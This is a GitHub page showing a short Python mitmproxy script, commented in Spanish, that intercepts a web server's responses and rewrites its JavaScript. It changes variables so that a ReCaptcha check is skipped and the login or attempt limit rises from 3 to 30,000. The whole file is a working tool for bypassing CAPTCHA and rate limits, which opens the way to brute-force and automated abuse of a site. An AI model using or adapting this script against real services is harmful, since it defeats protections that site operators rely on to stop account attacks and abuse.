-
Notifications
You must be signed in to change notification settings - Fork 1
/
Copy pathmitmproxy_response.py
48 lines (36 loc) · 1.23 KB
/
mitmproxy_response.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
from mitmproxy import http
def response(flow: http.HTTPFlow) -> None:
"""
##############
Bloque 1
##############
"""
"""
Código Javascript que el servidor envía al cliente.
En este caso particular, la variable "ESROBOT" obliga al usuario hacer "ReCaptcha".
"""
server_response = b"var ESROBOT = '';"
"""
Nuevo código HTML/JS/etc que reemplazará al original (data tampering)
"""
tampered_response = b"var ESROBOT = 'no';"
"""
Instrucción para "mitmproxy" que reemplaza código original de forma 'inline'
"""
flow.response.content = flow.response.content.replace(server_response, tampered_response)
"""
##############
Bloque 2
##############
"""
server_response = b"var NUMERO_MAX_INTENTOS = 3;"
tampered_response = b"var NUMERO_MAX_INTENTOS = 30000;"
flow.response.content = flow.response.content.replace(server_response, tampered_response)
"""
##############
Bloque 3
##############
"""
server_response = b"var esrecaptcha = \"False\";"
tampered_response = b"var esrecaptcha = \"True\";"
flow.response.content = flow.response.content.replace(server_response, tampered_response)